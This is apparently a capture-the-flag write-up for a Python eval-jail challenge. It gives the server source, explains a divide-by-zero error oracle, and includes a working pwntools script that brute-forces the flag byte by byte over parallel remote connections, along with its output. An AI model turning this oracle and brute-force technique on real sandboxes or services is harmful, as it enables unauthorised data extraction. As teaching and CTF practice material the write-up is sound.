Infobahn CTF'25 — speechless

wow i'm in jail??? i'm speechless...

nc speechless.challs.infobahnc.tf 1337

We're given a Python server that looks like this:

#!/usr/bin/python3

allowed = "ab.=-/"

with open("flag.txt", 'rb') as f:
    flag = f.read()

a = None
while True:
    expr = input(">>> ")

    if not all(char in allowed for char in expr):
        print('you need to try harder')
        continue

    if any(f"{blocked}==" in expr or f"=={blocked}" in expr for blocked in "ab"):
        print('stop comparing the flag')
        continue

    try:
        a = eval(expr, {"a": a} | {"b" * (index + 1): char for index, char in enumerate(flag)})
    except:
        a = None
        print('stop breaking things >:(')

We're given a strange eval environment with a stateful a variable, and a bunch of b vars such that b is the first byte of the flag, bb is the second byte, and so on.

Note that we can only use the characters ab.=-/, and the only information we can leak is whether our eval throws an error.

Then, the key idea is this: we can use the except: handler as an error oracle so long as we can throw an error if and only if a b variable matches our guess. One way to do this is to conditionally trigger a divide by 0 exception:

  • Evaluate b/b -> a = 1
  • Evaluate b - a, which will set a = 0 if b = 1, or a > 0 otherwise.
  • Evaluate b / a, which will throw an error iff a = 0 in the previous step; this tells us if b = 1.

We can repeat those steps to query b - a - a - ... for any value of b, and we can swap b for bb, bbb, etc. to query each of the other characters of the flag.

For whatever reason, each query takes a decent amount of time on remote, which makes a sequential character-by-character approach slow. To speed things up, we can first find out how many characters are in the flag by repeatedly setting a = bbb... with one more b each time until we hit a NameError for referencing an undefined variable:

ky28059@ky28059:~$ nc speechless.challs.infobahnc.tf 1337
== proof-of-work: disabled ==
>>> b
>>> bb
>>> bbb
>>> bbbb
...
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
stop breaking things >:(

So the last valid index is 55. Once we know that, here's a script that brute-forces each character of the flag simultaneously by spawning 55 processes:

from multiprocessing import Pool

import pwn


def query(conn, index, val):
    conn.sendline(b'b/b')  # a is 1
    conn.recvuntil(b'>>>')
    conn.sendline(b'b' * index + b'-a' * val)  # a = bbb - val
    conn.recvuntil(b'>>>')
    conn.sendline(b'b/a')  # a = b / (bbb - val)
    res = conn.recvuntil(b'>>>').decode()
    return 'stop breaking things >:(' in res


def try_char(index):
    conn = pwn.remote('speechless.challs.infobahnc.tf', 1337)
    conn.recvuntil(b'>>>')

    for j in range(32, 128):
        if query(conn, index, j):
            return j


if __name__ == '__main__':
    a = Pool(processes=55).map(try_char, range(1, 55))
    print(a)
[105, 110, 102, 111, 98, 97, 104, 110, 123, 105, 95, 99, 97, 110, 39, 116, 95, 98, 101, 108, 105, 101, 118, 101, 95, 105, 95, 117, 115, 101, 100, 95, 101, 108, 108, 105, 112, 115, 105, 115, 95, 105, 110, 95, 97, 95, 106, 97, 105, 108, 95, 46, 46, 46]

Process finished with exit code 0

and we get the flag:

>>> ''.join([chr(x) for x in [105, 110, 102, 111, 98, 97, 104, 110, 123, 105, 95, 99, 97, 110, 39, 116, 95, 98, 101, 108, 105, 101, 118, 101, 95, 105, 95, 117, 115, 101, 100, 95, 101, 108, 108, 105, 112, 115, 105, 115, 95, 105, 110, 95, 97, 95, 106, 97, 105, 108, 95, 46, 46, 46]])
"infobahn{i_can't_believe_i_used_ellipsis_in_a_jail_..."

(there was an off-by-one in the script, but luckily we know the last character is } 😅)
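To see why the except: branch is the whole leak, here is a local model of the server (an added example, not part of the original writeup or the challenge source) that runs the NameError length probe and the three-step divide-by-zero query against a constructed flag, then repeats the run with the error message suppressed. The `Jail` class, its `uniform` switch and the sample flag are assumptions made for the illustration.

```python
ALLOWED = "ab.=-/"
ERR = "stop breaking things >:("
FLAG = b"demo{constructed_flag}"  # constructed sample, not the challenge flag


class Jail:
    """Local stand-in for the server loop. `uniform` is a hypothetical hardening switch."""

    def __init__(self, flag, uniform=False):
        self.env = {"b" * (i + 1): c for i, c in enumerate(flag)}
        self.a = None
        self.uniform = uniform

    def send(self, expr):
        """Return what the client sees printed before the next prompt."""
        if not all(ch in ALLOWED for ch in expr):
            return "you need to try harder"
        if any(f"{x}==" in expr or f"=={x}" in expr for x in "ab"):
            return "stop comparing the flag"
        try:
            self.a = eval(expr, {"a": self.a} | self.env)
            return ""
        except Exception:
            self.a = None
            # Hardened variant: a failed eval prints nothing, same as a successful one.
            return "" if self.uniform else ERR


def flag_length(jail, limit=256):
    """Count the names b, bb, ... that resolve before the first error (NameError)."""
    n = 0
    while n < limit and jail.send("b" * (n + 1)) != ERR:
        n += 1
    return n


def matches(jail, index, guess):
    """Three-step query: an error on the last step means byte `index` equals `guess`."""
    jail.send("b/b")                        # a = 1.0
    jail.send("b" * index + "-a" * guess)   # a = byte - guess
    return jail.send("b/a") == ERR          # ZeroDivisionError only when a == 0


def recover(jail, length):
    """Recover bytes 1..length inclusive; None marks a byte the oracle never resolved."""
    found = []
    for index in range(1, length + 1):
        hits = (g for g in range(32, 128) if matches(jail, index, g))
        found.append(next(hits, None))
    return found


def demo():
    leaky = Jail(FLAG)
    n = flag_length(leaky)
    leaked = bytes(recover(leaky, n))
    blind = recover(Jail(FLAG, uniform=True), n)
    return n, leaked, blind


if __name__ == "__main__":
    print(demo())
```

With the original error message the probe finds the length and every byte comes back; once a failed eval is indistinguishable from a successful one, the same queries resolve nothing.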
